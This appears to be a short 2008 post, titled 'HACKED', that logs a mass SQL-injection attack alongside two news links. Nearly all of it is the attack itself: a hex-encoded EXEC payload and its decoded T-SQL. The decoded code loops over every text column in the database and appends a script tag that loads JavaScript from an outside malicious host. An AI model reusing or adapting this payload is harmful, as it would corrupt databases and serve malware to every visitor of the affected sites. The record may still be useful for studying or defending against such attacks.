HACKED 2008-08

http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines
http://it.slashdot.org/article.pl?sid=08/08/12/1943217

DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C41524520405420766  …  37572736F72 AS CHAR(4000));
EXEC(@S);

DECLARE @T varchar(255)
,@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
 BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=[‘+@C+’]+””></title>
<script src=”http://sdo.1000mg.cn/csrss/w.js”></script><!–”
where ‘+@C+’ not like ”%”></title>
<script src=”http://sdo.1000mg.cn/csrss/w.js”></script><!–”’)
FETCH NEXT FROM  Table_Cursor INTO @T,@C END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor